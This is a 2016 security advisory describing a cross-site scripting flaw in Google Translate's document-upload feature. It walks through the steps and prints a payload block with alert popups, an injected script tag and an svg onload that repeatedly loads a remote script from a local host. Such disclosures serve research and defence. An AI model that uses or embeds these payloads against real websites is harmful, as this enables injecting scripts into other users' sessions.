Google Translate XSS [Cross Site Scripting]

2016.08.17
Credit: Jonatas Fil
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

[+] ~ J0nshu4w - Security Research and pentester. [+] [*] I'm a security researcher and found a sandbox fails, it consists of Cross Site Scripting, where can I send alerts, inject eval code, text, images, using the TAG <img>. [!] Testing in Windows / Linux / MacOS: Firefox, Chrome and Opera. [!] Ok Go! [!] To explore it open Google Translate [*] https://translate.google.com.br or [*] https://translate.google.com [!] After just below you have the option: [!] "Translate Document" [*] In this parameter we will inject XSS. [*] Create a .html file, .htm. [*] And in it we will by malicious code [XSS] with the TAG <img>. [+] My exploit for example: [+] ###################### <Img src = "http://i793.photobucket.com/albums/yy213/gilbef/GIFBRAZIOL.gif" onload = "alert (" xss by j0nshu4w ")"> </ img> <Marquee> <h1> xss is vuln by j0nshu4w </ h1> </ marquee> <Script> alert (document.domain) </ script>     <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//localhost:1338";d.body.appendChild(z)},0)> #################### [*] After you have saved, select the file there in document translation options and click translate. [#] After this XSS successfully :D [#] DEMO: http://imgur.com/a/XLzd4 ###################### Made In Brazil 1337 [+] ~ J0nshu4w - Security Research and pentester. [+] Facebook: /jonatasfil Github: /ninj4c0d3r Youtube: /c/jonatasfil

References:

https://pt.wikipedia.org/wiki/Cross-site_scripting
http://www.acunetix.com/websitesecurity/cross-site-scripting/
http://imgur.com/a/XLzd4


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top